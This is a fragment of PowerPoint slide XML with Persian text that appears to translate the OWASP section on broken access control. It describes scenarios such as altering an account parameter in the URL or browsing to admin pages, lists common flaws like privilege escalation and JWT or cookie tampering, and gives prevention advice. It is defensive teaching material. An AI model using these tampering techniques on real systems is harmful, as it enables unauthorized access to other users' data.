              <a:t> از داده های تأیید نشده که به اطلاعات حساب دسترسی دارد، استفاده می کند:</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gn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مهاجم به سادگی پارامتر '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>acct' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را در مرورگر برای ارسال هر تعداد حساب کاربری که میخواهند تغییر می دهد. اگر به درستی تأیید نشده باشد، مهاجم میتواند به هر حساب کاربر دسترسی پیدا کند.</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gn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک مهاجم به سادگی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های هدف را مرور می کند. حقوق مدیر برای دسترسی به صفحه مدیریت لازم است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3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gn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر یک کاربر احراز هویت نشده بتواند به هر صفحه دسترسی داشته باشد، این یک نقص است. اگر شخصی به جز مدیر بتواند به صفحه مدیریت دسترسی پیدا کند، این نیز یک نقص است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنترل دسترسی سیاست را به گونه ای اعمال می کند که کاربران نمی توانند خارج از مجوز های مرتبط با خود عمل کنند. شکست کنترل دسترسی معمولا به افشای اطلاعات غیر مجاز، اصلاح یا خراب کردن تمام داده ها یا انجام یک کار تجاری در خارج از محدوده کاربر منجر می شود. آسیب پذیری های رایج کنترل دسترسی عبارتند از:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دور زدن بررسی های کنترل دسترسی از طریق تغییر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>وضعیت برنامه کاربردی، یا صفحه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا با استفاده از یک ابزار حمله سفارشی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجازه دادن به کلید اصلی برای تعویض شدن با رکورد کاربران دیگر، اجازه مشاهده یا ویرایش حساب کاربری شخصی دیگر. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بالا بردن امتیاز. کار کردن به عنوان یک کاربر بدون ورود به سیستم و یا کار کردن به عنوان یک مدیر زمانی که به عنوان یک کاربر وارد سیستم شده است. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دستکاری متادیتا، مانند بازپخش یا دستکاری با یک توکن دسترسی به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JSON Web Token (JWT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا یک کوکی یا فیلد پنهان دستکاری شده برای افزایش امتیازات و یا سوء استفاده از لغو </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنظیم اشتباه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CORS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجازه دسترسی غیر مجاز </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را می دهد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجبار به مرور صفحات مجاز به عنوان یک کاربر نامعتبر یا صفحات مجاز به عنوان یک کاربر استاندارد. دسترسی به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با کنترل دسترسی از دست رفته برای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>POST، PUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DELETE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنترل دسترسی تنها در صورتی که در کد سمت سرور مورد اعتماد یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بدون سرور اعمال شود، مؤثر است. جایی که مهاجم نمی تواند بررسی کنترل دستسری یا متا دیتا را تغییر دهد. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به استثنای منابع عمومی، انکار به طور پیشفرض. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deny by default</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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یک بار اجرای مکانیزم کنترل دسترسی و استفاده مجدد از آنها در طول برنامه، از جمله به حداقل رساندن استفاده از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CORS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنترل دسترسی های مدل باید مالکیت رکوردها را به جای پذیرفتن اینکه کاربر می تواند هر یک از رکوردها را ایجاد، خواندن، به روز رسانی و یا حذف آن، اعمال کند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>الزامات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>محدودیت کسب و کار یکتا باید توسط مدلهای دامنه اجرا شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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غیر فعال کردن فهرست دایرکتوری وب سرور و اطمینان از اینکه متا داده فایل به عنوان مثال .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) و فایل های پشتیبان در وب های ریشه موجود نیست.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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نقص شدن های کنترل دسترسی را ثبت کنید، در صورت لزوم به مدیران هشدار دهید (برای مثال نقص های مکرر). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
